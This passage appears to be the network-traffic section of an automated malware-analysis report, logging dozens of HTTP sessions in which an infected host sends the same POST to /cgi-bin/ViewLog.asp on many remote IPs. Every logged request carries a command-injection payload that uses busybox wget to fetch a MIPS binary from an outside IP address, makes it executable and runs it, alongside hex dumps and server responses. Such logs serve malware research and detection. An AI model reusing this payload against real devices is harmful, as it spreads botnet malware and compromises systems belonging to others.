                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.502917051 CET99INHTTP/0.0 307 Temporary Redirect


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              580192.168.2.145047285.196.244.2208080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.370743036 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.514728069 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.732182980 CET75INHTTP/1.1
                                              Data Raw:
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              581192.168.2.143592694.120.96.2358080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.372840881 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              582192.168.2.143909485.248.157.1518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.799005032 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              583192.168.2.145102294.66.247.968080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.807293892 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.480331898 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              584192.168.2.143427094.120.233.1738080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.809057951 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:00.065686941 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:06.209465027 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.240842104 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              585192.168.2.144895631.150.116.858080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.811943054 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.138290882 CET363INHTTP/1.0 404 Not Found
                                              Date: Thu, 23 Nov 2023 06:42:09 GMT
                                              Server: Boa/0.94.13
                                              Connection: close
                                              Content-Type: text/html; charset=ISO-8859-1
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              586192.168.2.143428494.121.111.338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.812973022 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              587192.168.2.145380631.200.99.2358080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.817173004 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              588192.168.2.144245694.252.115.78080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.818931103 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.103672028 CET1340INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 23 Nov 2023 04:17:55 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Keep-Alive: timeout=20
                                              Vary: Accept-Encoding
                                              ETag: W/"62a83cc4-2ea3"
                                              Content-Encoding: gzip
                                              Data Raw: 32 30 66 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 84 79 d7 12 83 da 72 e5 3b 5f e1 f1 3c e2 5b 08 44 10 c7 a1 8a 9c 73 e6 8d 9c 33 48 80 cb ff 6e ce bd 63 8f 67 fc 60 a9 54 da 82 66 ab 37 ec ee 5e 6b f5 3f fd 2f d6 60 dc c8 e4 fe ae de 87 fe 5f 80 7f fa 8f af 22 c9 9f 5f 43 b1 27 7f 97 d5 c9 ba 15 fb 3f ff fd b1 97 7f f9 fc fd 73 78 db af be f8 97 74 ca af 7f 2d a7 71 ff 4b 99 0c 4d 7f fd 41 ad 4d d2 ff 83 58 f4 df 62 6f b2 e4 1f b6 64 dc fe b2 15 6b 53 fe e3 5f cd b6 e6 2e fe 80 91 f9 fc c7 bd 38 f7 bf 24 7d 53 8d 7f 64 c5 b8 17 eb bf d5 f0 bf 66 53 3f ad 7f fc ef 17 ce fc 17 73 04 7b cc fb 66 2c fe 52 17 4d 55 ef 7f e0 af e7 c0 90 ac 55 33 fe 65 9f e6 3f 30 7c 3e ff ad 19 aa 7f fd 2f c7 d0 c7 e6 df 80 7f 82 fe e6 e7 33 a8 ff b6 9c 3f 3d 7e dc 7f ac ff 6e 5b b3 7f fe fb 3c d9 93 3f 9a 21 a9 0a a8 9d ab 7f 4c 93 ad c0 d1 7f 80 c8 16 42 29 ca 72 ba 58 b6 2b 8a a6 2c 8e 72 28 5a a2 28 16 42 7e 34 4b 51 dc 9f c7 fe a7 0f f3 a7 0d f0 57 c3 4a 62 a8 ff f1 a3 fe 6d f2 ff 9c f8 bf 5f 03 fc cf 93 fc f7 8b fe 76 8d 0a fd 28 ca 66 28 ea a6 b4 8a a5 6c 8e 02 a8 fa 59 c2 c9 d1 d0 c7 a2 c4 e7 ec 63 f8 2c 4d 7b 96 f5 8c ff f3 d5 49 4c c5 09 f4 cf e2 99 9f c6 fc 69 6b d3 7f 9e 8c 9e b9 3c 86 b6 9e 6b 7e 91 09 fc d5 fe f9 41 53 de 63 5c 51 8c cd 39 dc 69 d5 4c ed 35 9a c7 05 5a a3 33 9e 9d 75 91 5d b3 de 28 d0 9d 3d dd 3a 1b 61 1e 22 5f b9 18 a3 5b 1a 20 bf 12 e2 28 ba fa 3f f7 ec b9 e9 ff df 8b a5 2a eb af de 2a f6 e3 39 f5 e7 52 b9 e7 df 35 fe ff da 71 cc b3 22 47 73 38 57 1a b8 cb 8b 78 1a c8 12 ae d5 10 95 7e 95 50 42 51 3f f6 59 1e c3 59 9a 4d b1 1f ea 00 b1 37 22 4f 06 25 f9 13 b8 3b eb 62 0f 58 79 d7 e1 32 b3 55 37 6b 17 36 fc ca b3 87 d0 b3 99 77 64 89 1a c0 5b d6 3e fa 71 94 4b 79 95 a2 30 34 fd 76 fa f5 2b 8f 76 9e dd b7 ba d5 ca d1 b6 14 8a cc 59 72 12 27 4f 75 b0 7a 6b 0b c1 9b 2b 29 29 ea 56 25 32 f9 76 09 92 c9 29 11 fc 02 7c 69 b5 c4 76 e7 1b a9 63 fd d6 e2 30 6d 4a 81 36 54 67 53 37 7d d8 2d be ba 8e c5 ee 30 26 ac 76 f5 3c 19 70 3a 89 9f 3a 4c e2 1a ea f1 96 60 46 fa f3 95 8e 18 73 d2 af 0f 7c 1a bf 51 0e dd e8 3b 79 f8 de 6a 09 b3 32 5e bf 79 11 77 99 e1 40 b2 69 c9 d9 59 95 45 ca 83 3b 9f 52 a6 61 f2 9c 91 a2 d9 86 3b 35 67 42 ee f6 27 52 ff f9 06 9e 61 84 32 35 fc f1 d9 9e 18 88 64 43 89 a9 9f f5 2f ed e3 e4 ea 8f 84 34 58 9f 70 8e 2a f8 3a bf 6a 94 6d 7a d1 70 11 16 44 0b c1 10 b1 5d 5e 9f af 11 70 9f 9a e5 02 59 01 18 24 b7 b4 cc 46 bb c9 16 14 cf 0a 94 ac 0a 0a c3 e1 a6 65 bf 9a 23 8c 96 6d ca 7d 0b 5c 02 f9 34 a6 29 3b ef 41 24 cd 8e bc 05 9d 68 a1 2f 4a cf ef ff d7 b3 bf fa a6 be ec a3 5c 75 f3 0d 9f 6d 22 5e 77 30 0b b7 1e f7 c9 a1 ca 7b 68 0e 11 37 be 44 59 48 ba 68 82 64 58 72 41 6d ea 9a 01 f3 88 c0 b9 6b 9f df 1a dc cb 54 40 9e 05 da 1d 88 cf ae 5d c5 a5 83 4e 57 7b 9c a4 af 61 d4 b0 e9 32 e8 e8 2b ea 24 5e b0 9d 8f 24 40 89 ef e7 bf 6d 49 67 10 c5 4e f1 43 bf 08 cd 24 77 05 8a 1b 63 0b 84 3d 00 52 b1 65 76 47 e3 43 bc 2c 67 b2 e0 23 35 80 b1 98 1b 32 22 1a b6 cf 82 50 b1 df 81 6d f8 ce 54 8e 83 6b 63 e8 3a 5b d6 cd b3 f2 4e db c7 41 ef a3 f5 eb e7 0b ea 7e 23 d7 17 40 24 ab e3 0b 0e 43 6d c7 77 97 92
                                              Data Ascii: 20ffyr;_<[Ds3Hncg`Tf7^k?/`_"_C'?sxt-qKMAMXbodkS_.8$}SdfS?s{f,RMUU3e?0|>/3?=~n[<?!LB)rX+,r(Z(B~4KQWJbm_v(f(lYc,M{ILik<k~ASc\Q9iL5Z3u](=:a"_[ (?**9R5q"Gs8Wx~PBQ?YYM7"O%;bXy2U7k6wd[>qKy04v+vYr'Ouzk+))V%2v)|ivc0mJ6TgS7}-0&v<p::L`Fs|Q;yj2^yw@iYE;Ra;5gB'Ra25dC/4Xp*:jmzpD]^pY$Fe#m}\4);A$h/J\um"^w0{h7DYHhdXrAmkT@]NW{a2+$^$@mIgNC$wc=RevGC,g#52"PmTkc:[NA~#@$Cmw


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              589192.168.2.143612262.72.63.68080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.013597965 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.232815981 CET113INHTTP/1.1 400 Bad Request
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              590192.168.2.143607895.131.72.1618080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.022675037 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.268435001 CET278INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 106
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              591192.168.2.143302285.209.192.608080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.185041904 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.348119974 CET227INHTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Thu, 23 Nov 2023 04:18:00 GMT
                                              Content-Type: text/html
                                              Content-Length: 0
                                              Connection: close
                                              ETag: "65589d6c-0"


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              592192.168.2.145264894.110.65.818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.221030951 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
